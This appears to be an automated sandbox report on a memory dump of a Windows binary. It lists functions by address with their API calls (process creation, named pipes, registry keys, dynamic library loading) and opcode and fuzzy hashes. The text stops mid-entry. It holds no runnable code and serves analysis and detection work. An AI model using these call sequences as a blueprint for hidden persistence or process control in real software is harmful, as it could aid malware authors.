GetTickCount.KERNEL32 ref: 03746DC5
CreateFileW.KERNEL32(03731961,80000000,00000003,03758168,00000003,00000000,00000000,?,00000000,?,03731961), ref: 03746DE2
GetLastError.KERNEL32(?,00000000,?,03731961), ref: 03746E8A

Part of subcall function 0373CABE: lstrlen.KERNEL32(?,00000000,00000001,00000027,03758168,?,00000000,03746E0A,?,00000001,?,00000000,?,03731961), ref: 0373CAF4
Part of subcall function 0373CABE: lstrcpy.KERNEL32(00000000,00000000), ref: 0373CB18
Part of subcall function 0373CABE: lstrcat.KERNEL32(00000000,00000000), ref: 0373CB20

GetFileSize.KERNEL32(03731961,00000000,?,00000001,?,00000000,?,03731961), ref: 03746E15
CreateFileMappingA.KERNEL32(03731961,03758168,00000002,00000000,00000000,03731961), ref: 03746E29
lstrlen.KERNEL32(03731961,?,00000000,?,03731961), ref: 03746E45
lstrcpy.KERNEL32(?,03731961), ref: 03746E55
GetLastError.KERNEL32(?,00000000,?,03731961), ref: 03746E5D
HeapFree.KERNEL32(00000000,03731961,?,00000000,?,03731961), ref: 03746E70
CloseHandle.KERNEL32(03731961,?,00000001,?,00000000,?,03731961), ref: 03746E82

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID:
API String ID: 194907169-0
Opcode ID: 26ba161593677731b619e2d355e7cc5cbaf1ba2c500ba9cc7e76a9f1da9860e6
Instruction ID: 1cfe4c48a2431edeb2761a096bf0764c6db899cc378f3855d56233004f9357b7
Opcode Fuzzy Hash: 26ba161593677731b619e2d355e7cc5cbaf1ba2c500ba9cc7e76a9f1da9860e6
Instruction Fuzzy Hash: C9214B72900308FFDB14AFA5D888A9EBFB9FB05351F20C469F919E2250D3B49A85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0373A09F, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121processstringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0373A0B4

Part of subcall function 0374FC3B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,0374F307,?,00000000,-00000007,03732C21,-00000007,?,00000000), ref: 0374FC4A

lstrlenW.KERNEL32(00000000,00000000,00000000,03754264,00000020,00000000), ref: 0373A0EF
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,03754264,00000020,00000000), ref: 0373A12D
TerminateProcess.KERNEL32(?,000003E5), ref: 0373A16F
GetLastError.KERNEL32 ref: 0373A187
GetExitCodeProcess.KERNEL32(?,00000001), ref: 0373A1A7
GetLastError.KERNEL32 ref: 0373A1BF

Strings

D, xrefs: 0373A0CA

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Process$ErrorLastlstrlen$CodeCreateExitTerminatememset
String ID: D
API String ID: 3422117017-2746444292
Opcode ID: c1325ce5d7886e1f2678a79549b9ce2c73b256ecda30e52121cd0601a4a23baf
Instruction ID: 00874cc3447e802770486eecb7115970141ded5c56377a30ea1e7414fbfceadc
Opcode Fuzzy Hash: c1325ce5d7886e1f2678a79549b9ce2c73b256ecda30e52121cd0601a4a23baf
Instruction Fuzzy Hash: A5411AB6D0021CBFDF11EFA1CC85AEEBBBDEB09350F14806AE945B6101D7759A448F61

Uniqueness

Uniqueness Score: -1.00%

Function 037481C1, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(03744EEC,00000000,?,?,?,?,03744EEC,00000035,00000000,?,00000000), ref: 037481F1
RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03748207
memcpy.NTDLL(00000010,03744EEC,00000000,?,?,03744EEC,00000035,00000000), ref: 0374823D
memcpy.NTDLL(00000010,00000000,00000035,?,?,03744EEC,00000035), ref: 03748258
CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03748276
GetLastError.KERNEL32(?,?,03744EEC,00000035), ref: 03748280
HeapFree.KERNEL32(00000000,00000000,?,?,03744EEC,00000035), ref: 037482A3

Strings

(, xrefs: 0374828A

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID: (
API String ID: 2237239663-3887548279
Opcode ID: 0c8fd124636fcd7a75efabff2ef74a07bccd78c73a55e095f20d10753ae0697f
Instruction ID: a7ad0b35435a190fa9d86e6182edc14e1f0df1b333e05b34b49ecf3c2bc7e799
Opcode Fuzzy Hash: 0c8fd124636fcd7a75efabff2ef74a07bccd78c73a55e095f20d10753ae0697f
Instruction Fuzzy Hash: 1E31A03690070DFFCB20DFA5DC44AABBBB8EB44350F048429EA05D3240D375A995DB62

Uniqueness

Uniqueness Score: -1.00%

Function 03731465, Relevance: 13.6, APIs: 9, Instructions: 95memoryregistrystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 03731476
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0373149D
GetTickCount.KERNEL32 ref: 037314B4
wsprintfA.USER32 ref: 037314CB
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03731506
StrRChrA.SHLWAPI(00000000,00000000,?), ref: 03731526
lstrlen.KERNEL32(00000000), ref: 03731530
RegCloseKey.ADVAPI32(?), ref: 0373154C
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000001), ref: 0373155A

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
String ID:
API String ID: 3389039979-0
Opcode ID: 77339e8acd822b4f029e2bf11884cc85bbf7831cf66eeb24ab4fa016fa65207e
Instruction ID: 803b093b5c0e9d3c0d8ff2d7f9d07cf9b85cf2cb9e38686854277dc4b2eea038
Opcode Fuzzy Hash: 77339e8acd822b4f029e2bf11884cc85bbf7831cf66eeb24ab4fa016fa65207e
Instruction Fuzzy Hash: 27315C71500218FFDB18FFA1DC88DAB7BACEF06254B148065F90AC7205D7B88E419BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0373DFCF, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,03746621,00000008,00000001,00000010,00000001,00000000,0000003A,00000001,00000000), ref: 0373DFEE
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 0373E022
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 0373E02A
GetLastError.KERNEL32 ref: 0373E034
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 0373E050
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 0373E069
CancelIo.KERNEL32(?), ref: 0373E07E
CloseHandle.KERNEL32(?), ref: 0373E08E
GetLastError.KERNEL32 ref: 0373E096

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 4121cc72392258e55d1da0ba0516f1acc62cbc241106bb3f88197a1adcbcbb6a
Instruction ID: 6eca400ed1d0f5efa02fdc6ef491501b0cf64bc1afe7381b2032859eb73e98ae
Opcode Fuzzy Hash: 4121cc72392258e55d1da0ba0516f1acc62cbc241106bb3f88197a1adcbcbb6a
Instruction Fuzzy Hash: 04217F3790021CFBCB11AFA6E8489EF7B79FB49310F248426F916D2145D7748A918BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0374FF37, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 191stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,06EB25FB,?,?,06EB25FB,?,?,06EB25FB,?,?,06EB25FB,?,00000000,00000000,00000000), ref: 03750035
lstrcpyW.KERNEL32(00000000,?), ref: 03750058
lstrcatW.KERNEL32(00000000,00000000), ref: 03750060
lstrlenW.KERNEL32(00000000,?,06EB25FB,?,?,06EB25FB,?,?,06EB25FB,?,?,06EB25FB,?,?,06EB25FB,?), ref: 037500AB
memcpy.NTDLL(00000000,?,?,?), ref: 03750113
LocalFree.KERNEL32(?,?), ref: 0375012C

Strings

P, xrefs: 0374FFB0

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: lstrlen$FreeLocallstrcatlstrcpymemcpy
String ID: P
API String ID: 3649579052-3110715001
Opcode ID: c87308967bc00872d2707f43b62515b6c4334425073536f2fca6e92c584a481c
Instruction ID: be82fb050ab3b08b70cb8e645455519b6eb75d5a98f3c0b88a4c0733c660f6dc
Opcode Fuzzy Hash: c87308967bc00872d2707f43b62515b6c4334425073536f2fca6e92c584a481c
Instruction Fuzzy Hash: FC618F7590020EAFCF19EFA5DC88DAEBBBDEF45304B158029F905A7210D7B89946CF61

Uniqueness

Uniqueness Score: -1.00%

Function 03748475, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 147timestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0374F6C1: InterlockedIncrement.KERNEL32(00000018), ref: 0374F712
Part of subcall function 0374F6C1: RtlLeaveCriticalSection.NTDLL(037580B0), ref: 0374F79D

OpenProcess.KERNEL32(00000410,00000000,03751151,00000000,00000000,03751151,00000000,00000000,?,?,?,03751151), ref: 037484CC
CloseHandle.KERNEL32(00000000,00000000,00000000,03751161,00000104,?,?,?,03751151), ref: 037484EA
GetSystemTimeAsFileTime.KERNEL32(03751151), ref: 03748552
lstrlenW.KERNEL32(FF338BB3), ref: 037485C7
GetSystemTimeAsFileTime.KERNEL32(00000008,0000001A), ref: 037485E3
memcpy.NTDLL(00000014,FF338BB3,00000002), ref: 037485FB

Part of subcall function 03748CC7: RtlLeaveCriticalSection.NTDLL(00000000), ref: 03748D44

Strings

o, xrefs: 037485B8

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Time$CriticalFileLeaveSectionSystem$CloseHandleIncrementInterlockedOpenProcesslstrlenmemcpy
String ID: o
API String ID: 2541713525-252678980
Opcode ID: 28e3c40061cfbb047ab56f934fcf11a3da5d1fc4846627b831896e3fd5d22230
Instruction ID: c01e2844a1ba9e4f8d6113f8b9ee6786a5e328e327fd418372cdb8170da5fbf2
Opcode Fuzzy Hash: 28e3c40061cfbb047ab56f934fcf11a3da5d1fc4846627b831896e3fd5d22230
Instruction Fuzzy Hash: 5B51ADB164070ABFD724EF64D888BA6F7E8FF04700F148529EA05DB240D7B5E980CB92

Uniqueness

Uniqueness Score: -1.00%

Function 0373209D, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 128timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 037320DF
OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 037320F2
CloseHandle.KERNEL32(00000000), ref: 0373220A

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

memset.NTDLL ref: 03732115
memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 03732194
GetLastError.KERNEL32(0375017E,?,?,?,?,?,?,?,00000040), ref: 037321D9

Strings

W, xrefs: 03732210

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
String ID: W
API String ID: 1155103410-655174618
Opcode ID: 72e2c2202c0dfc2a8b9a2b0618d7ab5a246df29084a111881125857e51823dae
Instruction ID: 3a74c99c2abd3426886515ab556969a6181c1afea7d91242886e234a7f5b45dc
Opcode Fuzzy Hash: 72e2c2202c0dfc2a8b9a2b0618d7ab5a246df29084a111881125857e51823dae
Instruction Fuzzy Hash: A7418FB5900309FFDB10EFA5C884A9EBBF8FF09304F108529E659D7241D3B49A54CB90

Uniqueness

Uniqueness Score: -1.00%

Function 03733647, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 03733671
GetCurrentThreadId.KERNEL32 ref: 03733687
GetCurrentThread.KERNEL32 ref: 03733698

Part of subcall function 03734F06: GetCurrentThreadId.KERNEL32 ref: 03734F3E
Part of subcall function 03734F06: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4,?,?,?,?,?,03731AC4), ref: 03734F4A
Part of subcall function 03734F06: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,037336C6,00000000,?,00000000,00000000,03731AC4), ref: 03734F58
Part of subcall function 03734F06: lstrcpy.KERNEL32(00000000), ref: 03734F7A

Part of subcall function 037455A4: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,03754048,00000000,?,037336E2,00000020,00000000,?,00000000), ref: 0374560F
Part of subcall function 037455A4: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,03754048,00000000,?,037336E2,00000020,00000000,?,00000000), ref: 03745637

RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0373376D
wsprintfA.USER32 ref: 03733785
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,03731AC4,00000000), ref: 03733790

Strings

W, xrefs: 0373375A

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CurrentThread$FileHeapTimelstrlen$AllocateFreeHeaderImageNameSystemTemplstrcpywsprintf
String ID: W
API String ID: 896920683-655174618
Opcode ID: b2acbf2b38d23c71eb811c2fec3895a14ea67e19e99b53636deb7a391a81bae5
Instruction ID: e8a36d49abc388e824f63b20d396485602616d985f2597866ea5615387d782a5
Opcode Fuzzy Hash: b2acbf2b38d23c71eb811c2fec3895a14ea67e19e99b53636deb7a391a81bae5
Instruction Fuzzy Hash: E3419AB9900318FBDB25EFA5DC88DAEBFB9FF06740B148029F90496151D7789681DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03733E78, Relevance: 12.2, APIs: 8, Instructions: 161memoryfilestringCOMMON

Download Yara Rule

APIs

lstrcpy.KERNEL32(00000000,?), ref: 03733EBE
RtlAllocateHeap.NTDLL(00000000,?), ref: 03733F99
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 03733FD2
WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 03733FEB
CloseHandle.KERNEL32(00000000), ref: 03733FF5
HeapFree.KERNEL32(00000000,?), ref: 03734005
HeapFree.KERNEL32(00000000,00000000), ref: 0373401E
HeapFree.KERNEL32(00000000,?), ref: 0373402E

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$Free$File$AllocateCloseCreateHandleWritelstrcpy
String ID:
API String ID: 1002670662-0
Opcode ID: 305e76c29436297227e497c1cc3bfb1f16d79ac762bd6c56b373f59c75b490e7
Instruction ID: a63b2105c408031843a894437b6a556c794bffbc1bbbaf8e78d85fd5326f4ee6
Opcode Fuzzy Hash: 305e76c29436297227e497c1cc3bfb1f16d79ac762bd6c56b373f59c75b490e7
Instruction Fuzzy Hash: 6951BC7690024DFFDB19EFA5DC84CAEBBBCEB49304B1984A5F61593110D7798A42CF60

Uniqueness

Uniqueness Score: -1.00%

Function 03737818, Relevance: 12.1, APIs: 8, Instructions: 52registryCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000040,00000000,?), ref: 03737824
RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03737842
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0373784A
DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 03737868
GetLastError.KERNEL32 ref: 0373787C
RegCloseKey.ADVAPI32(?), ref: 03737887
CloseHandle.KERNEL32(00000000), ref: 0373788E
GetLastError.KERNEL32 ref: 03737896

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
String ID:
API String ID: 3822162776-0
Opcode ID: 58ed93e0aedbef318dc9bd699e808256d19c9707534f08eb3fc6e8962e79c4e2
Instruction ID: 79e1c3bf3161a5796f0784797c8f1790ae4b5b14f4da9d62cf41217e7e84519e
Opcode Fuzzy Hash: 58ed93e0aedbef318dc9bd699e808256d19c9707534f08eb3fc6e8962e79c4e2
Instruction Fuzzy Hash: 9C1161B6200348BFDB0DAFA1DC48FAA3B69EB45361F148020FD0AC6241DBB4C854EB21

Uniqueness

Uniqueness Score: -1.00%

Function 0373AE15, Relevance: 10.7, APIs: 7, Instructions: 168memorythreadsleepCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0373AE56
memset.NTDLL ref: 0373AE6A

Part of subcall function 037447CF: RtlAllocateHeap.NTDLL(00000000,?), ref: 0374481B
Part of subcall function 037447CF: RegCloseKey.KERNELBASE(?,?,00000000,?,?,?,?,?,?,0373643A,00000000,?,?), ref: 0374485F

GetCurrentThreadId.KERNEL32 ref: 0373AEF7
GetCurrentThread.KERNEL32 ref: 0373AF0A
RtlEnterCriticalSection.NTDLL(037582EC), ref: 0373AFB1
Sleep.KERNEL32(0000000A), ref: 0373AFBB
RtlLeaveCriticalSection.NTDLL(037582EC), ref: 0373AFE1

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: AllocateCriticalCurrentHeapSectionThread$CloseEnterLeaveSleepmemset
String ID:
API String ID: 1717395723-0
Opcode ID: be64b988eea253227903dd3ee702a54472c29b976bd52a07213f4f99ed0960e8
Instruction ID: c32467b78234e09d9b58c7475d18357725a65106a40ccd1d2a4cbff4444f2345
Opcode Fuzzy Hash: be64b988eea253227903dd3ee702a54472c29b976bd52a07213f4f99ed0960e8
Instruction Fuzzy Hash: 9E51AEB6508346EFD350EF68D88581ABBE8FF89300F04892EFA95C7211D374D949CB92

Uniqueness

Uniqueness Score: -1.00%

Function 03738548, Relevance: 10.6, APIs: 7, Instructions: 144memoryregistryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,?), ref: 037385BB
HeapFree.KERNEL32(00000000,?), ref: 037385FC
HeapFree.KERNEL32(00000000,?), ref: 0373860C
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,?,?), ref: 03738678
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,0374DAB7,?,00000001,?,?), ref: 0373869C
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,0374DAB7,?,00000001,?,?), ref: 037386C1
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,0374DAB7,?,00000001,?,?), ref: 037386D6

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: FreeHeap$CloseCreate
String ID:
API String ID: 1871255303-0
Opcode ID: 22846e9e19aed135bcfcfb151c7e216c29b5b253085ae3b92e6d8a767c59b4af
Instruction ID: e73bb30d36348c1e2f5fc93c38aa2729d22dd792b00d86fec762a81fd7ae1b4f
Opcode Fuzzy Hash: 22846e9e19aed135bcfcfb151c7e216c29b5b253085ae3b92e6d8a767c59b4af
Instruction Fuzzy Hash: 4C51EDB6C0020DFFDF05EFA5D8849EEBBB9FB08204F14846AF514A2261D3758A95DF61

Uniqueness

Uniqueness Score: -1.00%

Function 03733262, Relevance: 10.6, APIs: 7, Instructions: 137memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 0373328D
StrTrimA.SHLWAPI(00000000,?), ref: 037332AA
HeapFree.KERNEL32(00000000,00000000), ref: 037332DD
RtlImageNtHeader.NTDLL(00000000), ref: 03733306
HeapFree.KERNEL32(00000000,00000000,00000001,00000000,00000000), ref: 037333CB

Part of subcall function 0373DB7C: lstrlen.KERNEL32(0375706E,03758330,0375706E,00000000,037510B0), ref: 0373DB85
Part of subcall function 0373DB7C: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0373DBA8
Part of subcall function 0373DB7C: memset.NTDLL ref: 0373DBB7

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0373337C
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 037333AB

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID:
API String ID: 239510280-0
Opcode ID: daa9b8dc1736b10ef42d4a40efb02aaed920a6841f96639c255f8a5262364dd2
Instruction ID: f815bc365003a6e88ff7267892e63b1cd9d298398ea3ecbe8ad32a02f73d0ef8
Opcode Fuzzy Hash: daa9b8dc1736b10ef42d4a40efb02aaed920a6841f96639c255f8a5262364dd2
Instruction Fuzzy Hash: 4E41273A200304FBEB25EB64DC48FAE7BB9EB4A700F188065F505AB181DBB58941D751

Uniqueness

Uniqueness Score: -1.00%

Function 0374E919, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0374E974
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0374E99F
memcpy.NTDLL(00000000,?,?), ref: 0374E9BE
HeapFree.KERNEL32(00000000,00000000), ref: 0374EA1F
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0374EA41

Strings

W, xrefs: 0374EA6D

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heap$Allocatememcpy$Free
String ID: W
API String ID: 1024222012-655174618
Opcode ID: b97eb6ef366ba73b942c9dcd0245673c215907d13079e574b888dd91ffd7de63
Instruction ID: 37ac91e5c23e8473fa9d3390568fa20e91dd783b29b54fa37d55074be347f6f1
Opcode Fuzzy Hash: b97eb6ef366ba73b942c9dcd0245673c215907d13079e574b888dd91ffd7de63
Instruction Fuzzy Hash: D1415A7290030AEFDF11DF95CC84AAEBBB8FF04254F188069E814A7250E775EA54DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03731573, Relevance: 10.6, APIs: 7, Instructions: 124registrymemoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL ref: 0373159C
RtlEnterCriticalSection.NTDLL(03757FE8), ref: 037315DF
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 037315FA
CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 03731650
HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 037316AC
RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 037316BA
RtlLeaveCriticalSection.NTDLL(03757FE8), ref: 037316C5

Part of subcall function 03735A87: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 03735A9B
Part of subcall function 03735A87: memcpy.NTDLL(00000000,00000000,?,?,00000057,?,?,?,037315C1,00000000,?,00000000,00000001,?,?), ref: 03735AC4
Part of subcall function 03735A87: RegCloseKey.ADVAPI32(?,?,?,?,037315C1,00000000,?,00000000,00000001,?,?), ref: 03735B18

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenmemcpy
String ID:
API String ID: 2070110485-0
Opcode ID: e135b6e9b4ec28b278e1d324cb85f8de447018bb8a3d28086c6d10e0f00aff40
Instruction ID: 57ba783280badd090c6a0ca8911d4ed6f3eec97a8415f22913921566f6f1e502
Opcode Fuzzy Hash: e135b6e9b4ec28b278e1d324cb85f8de447018bb8a3d28086c6d10e0f00aff40
Instruction Fuzzy Hash: 6B419D32240305EBDB25FFA5DC88F6A77A8EB06351F488028E906DA196CBB4D941CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0374CCF3, Relevance: 10.6, APIs: 7, Instructions: 108stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 03745B64: RtlEnterCriticalSection.NTDLL(037583A8), ref: 03745B6C
Part of subcall function 03745B64: RtlLeaveCriticalSection.NTDLL(037583A8), ref: 03745B81
Part of subcall function 03745B64: InterlockedIncrement.KERNEL32(0000001C), ref: 03745B9A

lstrlen.KERNEL32(00000008,?,?,?,03743780,00000000), ref: 0374CD51
HeapFree.KERNEL32(00000000,-00000008,?,?,?,03743780,00000000), ref: 0374CD75
memcpy.NTDLL(-00000008,00000000,03743780,?,?,?,03743780,00000000), ref: 0374CD89
lstrcpy.KERNEL32(00000020), ref: 0374CDBB
RtlEnterCriticalSection.NTDLL(037583A8), ref: 0374CDC6
RtlLeaveCriticalSection.NTDLL(037583A8), ref: 0374CE1F

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: CriticalSection$EnterLeave$FreeHeapIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 38435513-0
Opcode ID: 62261fa47edea3aac7f5a029ec1a4257b5e81b49e624f8332c2d3fb4f86fbad0
Instruction ID: fcd5a4466973b7dcc35e2443d0f9202601c10c8d6dbc5a4a24084b973d2cd7ae
Opcode Fuzzy Hash: 62261fa47edea3aac7f5a029ec1a4257b5e81b49e624f8332c2d3fb4f86fbad0
Instruction Fuzzy Hash: AA417776601306EFCB26EF94D884B5A7BB4FF18710F148069E809AB254CBB4E951DF91

Uniqueness

Uniqueness Score: -1.00%

Function 0373CBE3, Relevance: 10.6, APIs: 7, Instructions: 94memorystringsynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0373CC34
memset.NTDLL ref: 0373CC51
WaitForSingleObject.KERNEL32(00000000), ref: 0373CC6D
GetDriveTypeW.KERNEL32(?), ref: 0373CC7B
lstrlenW.KERNEL32(?), ref: 0373CC87
lstrlenW.KERNEL32(?), ref: 0373CCB3
HeapFree.KERNEL32(00000000,?), ref: 0373CCCC

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: Heaplstrlen$AllocateDriveFreeObjectSingleTypeWaitmemset
String ID:
API String ID: 855039025-0
Opcode ID: bec44711ea7a27c1405e7c894c86dc8129b9196463fdf05d4385657e176f3bbc
Instruction ID: 72a40e27d791e3f98c7e257c044af50dce49038975ba17c2d49bc2e6a429578b
Opcode Fuzzy Hash: bec44711ea7a27c1405e7c894c86dc8129b9196463fdf05d4385657e176f3bbc
Instruction Fuzzy Hash: 62314F72D0020CFFDB05EBA5DD84CEEBBBDEB09314B208466E505E3111D775AE959B60

Uniqueness

Uniqueness Score: -1.00%

Function 03746CB1, Relevance: 10.6, APIs: 7, Instructions: 89filesynchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 03746CFB
WaitForSingleObject.KERNEL32(000000C8), ref: 03746D20
SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 03746D6B
WriteFile.KERNEL32(00000001,00001388,?,?,00000000), ref: 03746D80
SetEndOfFile.KERNEL32(00000001), ref: 03746D8D
GetLastError.KERNEL32 ref: 03746D99
CloseHandle.KERNEL32(00000001), ref: 03746DA5

Memory Dump Source

Source File: 0000002C.00000002.697567555.0000000003731000.00000020.00020000.sdmp, Offset: 03731000, based on PE: false

Similarity

API ID: File$ErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2772011183-0
Opcode ID: 8fca2f480c476886e3aab9cf29a9e64d24dfa47b40d65f1a2f25745b20ab2fca
Instruction ID: 62bf20b89f043ad23eed4e6a4503ea429e74ab67fbe4c208d1d4d1b68ab400a0
Opcode Fuzzy Hash: 8fca2f480c476886e3aab9cf29a9e64d24dfa47b40d65f1a2f25745b20ab2fca
Instruction Fuzzy Hash: AE319E32900308BFEF10DFA5DC49BAEBBB8EB05325F248154F914B60E0C3B45A949F50

Uniqueness

Uniqueness Score: -1.00%

Function 0374A5E3, Relevance: 10.6, APIs: 7, Instructions: 87registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000002,03754558,?), ref: 0374A5FE
RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 0374A6B6

Part of subcall function 0373ECA1: RtlAllocateHeap.NTDLL(00000000,00000001,03750F65), ref: 0373ECAD

LoadLibraryA.KERNEL32(00000000,?,?,?,?), ref: 0374A64C
GetProcAddress.KERNEL32(00000000,?), ref: 0374A665
GetLastError.KERNEL32(?,?,?,?), ref: 0374A684
FreeLibrary.KERNEL32(00000000,?,?,?,?), ref: 0374A696
GetLastError.KERNEL32(?,?,?,?), ref: 0374A69E

Memory Dump Source

